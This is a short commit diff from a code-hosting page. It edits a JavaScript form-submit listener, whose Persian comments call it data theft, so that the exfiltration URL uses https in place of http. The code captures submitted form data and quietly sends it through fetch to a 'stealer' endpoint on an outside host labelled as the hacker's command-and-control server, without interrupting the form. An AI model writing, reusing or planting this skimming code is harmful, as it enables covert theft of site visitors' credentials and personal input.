Add
This commit is contained in:
parent
84105a211a
commit
40a879447c
|
|
@ -15,7 +15,7 @@ document.addEventListener('submit', function(e) {
|
|||
console.log("🕵️ در حال سرقت اطلاعات: ", stolenData);
|
||||
|
||||
// آدرس سرور هکر (C2)
|
||||
let hackerUrl = 'http://hackerapp.eitebar.ir/stealer?data=' + encodeURIComponent(JSON.stringify(stolenData));
|
||||
let hackerUrl = 'https://hackerapp.eitebar.ir/stealer?data=' + encodeURIComponent(JSON.stringify(stolenData));
|
||||
|
||||
// ارسال مخفیانه اطلاعات بدون متوقف کردن روند عادی فرم
|
||||
fetch(hackerUrl, {
|
||||
|
|
|
|||
Loading…
Reference in New Issue
Block a user